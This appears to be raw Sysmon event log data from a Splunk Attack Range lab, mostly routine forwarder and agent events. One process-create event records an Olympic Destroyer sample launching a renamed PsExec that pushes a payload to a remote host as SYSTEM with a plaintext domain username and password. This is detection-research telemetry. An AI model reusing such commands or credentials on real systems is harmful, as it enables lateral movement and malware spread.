Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6755F606F717D7B551A19AD5D58F083,SHA256=1B4DCCECB7026C46442DD399D2BDD107F9A43277CF0676F5B52103315854F8EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:30.594{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49189-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:33.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9497D7B2D912D81E5D5055FBD14CD89,SHA256=B8FB2ED512C1BF77D9D0D23233129894D2FBB412BC95132090345955A30BC279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:34.239{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51604AE67285182F6604DE61D17B33C1,SHA256=F357BD7CBE76F716E8B55167105EAFB01CE865A831294DF34878312ACE88590A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:31.608{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51502-false10.0.1.12-8000- 23542300x8000000000000000219122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:34.254{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93E5E85BA6EBA027262002F1238DCD48,SHA256=D7388A0DCEB91191F56C1A5627B371E8514F9EAAFEBAC03FE01E7AC8B25B0AF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:35.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D068DCC67C76A5DE7C3462B27A771B4,SHA256=FF3C813BF0CF1A1346AED9B4D1C69DC6EC20A3EEB1296D5153A844EAB60B71A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:35.269{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD5824FCFF3D9965D3655D920D5CC24B,SHA256=3DFCD24ABAA5C545AF60B25DC82E288A6564D1C489D438F013ED47769955F679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.867{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-147MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.360{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.360{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.360{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.360{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.360{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.360{C8EA50B7-F2AD-6215-C000-000000003802}48565880C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.287{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26828457D3A985BAF8248B6CE5BF0A29,SHA256=2768387BD6E2F73C2C6978E3FB723D9646EF0F0BDC526949AF4CEA8D323C7667,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:33.882{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx57754-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:36.285{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73A0F916A8446D94C701588D725A98A,SHA256=ABBC8EC965FD4C3BA5A01285739B228C8CD077D7B5C302756AC71AA547B1056C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.913{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-14C5-6216-AB06-000000003802}6780C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.913{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-14C5-6216-AB06-000000003802}6780C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.901{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-148MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.860{C8EA50B7-14C5-6216-AB06-000000003802}67806980C:\Windows\system32\conhost.exe{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.704{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-14C5-6216-AB06-000000003802}6780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.704{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14C5-6216-AB06-000000003802}6780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.572{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.541{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.541{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.541{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.541{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.541{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.537{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.537{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.288{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDAF44D8597265EBC1D8730F1BB7FFD2,SHA256=D9E70CBF6DA24B329996ED2232CEFC18C5B34C9C0D642EAF3C9FA8DC9E50A694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:37.472{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B694235FFB76EB7C06AE537D8D44163B,SHA256=1E3904D7AE0AC657E37748E00FE1EFB9F91445A2DF6D8760E8EF507C3F9A023C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:37.300{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7410783238E29AF04DA79C664CDE8F0,SHA256=514C7D99F971CF1D0A8D2A71D1F57F70E104A3F93A67070978E3197CD43F71A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:38.316{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=292B3D2A784D7A035B496A17E125963D,SHA256=964A7BF6C42A511777EF78D403F4547A50DE067AC1D2DC9CA87FEACAEBE40ECD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:38.542{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=93D77FF795BA11C1B18DDB5413A26CB4,SHA256=A329A4D0431447960FAF388C7C3C3C501533AE8C6718CC06CA1F7B697435A24A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:38.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9E5FC9E93C7DE3A8D75D02F47B847589,SHA256=83A6668CF3F1BCF64003ED6FEC488C9C9F7208767782CBA4B372BBD0573E86FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:38.289{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F11DD57FFC373641EC67612DF5EEAB9,SHA256=9322AD0EF95856856B6DDCB301D7BE1C70A8213710B6B4EAAB637BDAE0CB325E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 